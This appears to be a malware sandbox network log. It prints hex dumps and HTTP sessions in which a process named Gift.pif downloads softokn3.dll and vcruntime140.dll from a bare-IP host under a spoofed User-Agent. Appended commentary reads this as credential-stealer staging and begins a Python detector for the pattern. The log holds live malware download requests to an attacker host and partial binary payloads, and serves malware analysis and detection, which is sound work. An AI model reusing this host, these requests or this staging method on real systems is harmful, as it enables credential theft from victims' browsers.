                                                                        2024-08-05 16:56:11 UTC16384INData Raw: 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8
                                                                        Data Ascii: E_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ
                                                                        2024-08-05 16:56:11 UTC16384INData Raw: 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03
                                                                        Data Ascii: u;t:]jYMS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s
                                                                        2024-08-05 16:56:11 UTC16384INData Raw: cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00
                                                                        Data Ascii: UQEVuF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|i
                                                                        2024-08-05 16:56:11 UTC16384INData Raw: 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01
                                                                        Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW


                                                                        Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID | Process
                                                                        14         | 192.168.2.5 | 49727       | 188.245.87.202 | 443              | 748 | C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-08-05 16:56:13 UTC | 245 | OUT | GET /softokn3.dll HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:13 UTC | 260 | IN | HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:13 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 257872
                                                                        Connection: close
                                                                        Last-Modified: Monday, 05-Aug-2024 16:56:13 GMT
                                                                        Cache-Control: no-store, no-cache
                                                                        Accept-Ranges: bytes
                                                                        2024-08-05 16:56:13 UTC16124INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                        2024-08-05 16:56:13 UTC16384INData Raw: 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81
                                                                        Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(
                                                                        2024-08-05 16:56:13 UTC16384INData Raw: 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d
                                                                        Data Ascii: EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM
                                                                        2024-08-05 16:56:13 UTC16384INData Raw: 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00
                                                                        Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
                                                                        2024-08-05 16:56:13 UTC16384INData Raw: 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00
                                                                        Data Ascii: 0{C!=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
                                                                        2024-08-05 16:56:13 UTC16384INData Raw: 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74
                                                                        Data Ascii: ]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt
                                                                        2024-08-05 16:56:13 UTC16384INData Raw: 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4
                                                                        Data Ascii: u ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZ
                                                                        2024-08-05 16:56:13 UTC16384INData Raw: 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00
                                                                        Data Ascii: uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
                                                                        2024-08-05 16:56:13 UTC16384INData Raw: 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c
                                                                        Data Ascii: ]]USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4|
                                                                        2024-08-05 16:56:13 UTC16384INData Raw: c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18
                                                                        Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%


                                                                        Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID | Process
                                                                        15         | 192.168.2.5 | 49728       | 188.245.87.202 | 443              | 748 | C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-08-05 16:56:14 UTC | 249 | OUT | GET /vcruntime140.dll HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:15 UTC | 259 | IN | HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:14 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 80880
                                                                        Connection: close
                                                                        Last-Modified: Monday, 05-Aug-2024 16:56:14 GMT
                                                                        Cache-Control: no-store, no-cache
                                                                        Accept-Ranges: bytes
                                                                        2024-08-05 16:56:15 UTC16125INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                        2024-08-05 16:56:15 UTC16384INData Raw: 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42
                                                                        Data Ascii: t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;B
                                                                        2024-08-05 16:56:15 UTC16384INData Raw: 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20
                                                                        Data Ascii: EEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt
                                                                        2024-08-05 16:56:15 UTC16384INData Raw: c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12
                                                                        Data Ascii: ttt@++t+t+u+uQ<0|*<9&w/c5~bASJCtv
                                                                        2024-08-05 16:56:15 UTC15603INData Raw: 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f
                                                                        Data Ascii: @L|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicroso

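Sessions 14, 15 and 16 show the same shape three times: Gift.pif, a .pif image running from a Temp directory, fetches softokn3.dll, vcruntime140.dll and nss3.dll from a bare-IP host while presenting a Yandex Browser User-Agent, and each reply is an application/octet-stream body that begins with the MZ header (the NSS libraries are what a stealer needs to decrypt Firefox-family credential stores). The Python below is an added example, not part of the Joe Sandbox report or of any tool it names: it scores session records rebuilt from the fields visible on this page and flags that staging pattern, and it generalises slightly by also listing the other DLLs such loaders commonly pull. The HttpSession field names, the extra DLL names (freebl3.dll, mozglue.dll, msvcp140.dll), the browser image list, the benign control session and the pe_stub() bytes are assumptions or constructed data, not taken from the report.

```python
"""Flag stealer-style DLL staging in sandbox HTTP session records (added example)."""
import ipaddress
import ntpath
import struct
from dataclasses import dataclass


@dataclass
class HttpSession:
    """One HTTP exchange as a log exporter might emit it. The field names are
    an assumption; the values used below are copied from the report."""
    session_id: int
    process: str          # image path of the process that owns the socket
    host: str             # Host header
    dst_port: int
    request_line: str     # e.g. "GET /nss3.dll HTTP/1.1"
    user_agent: str
    content_type: str
    content_length: int
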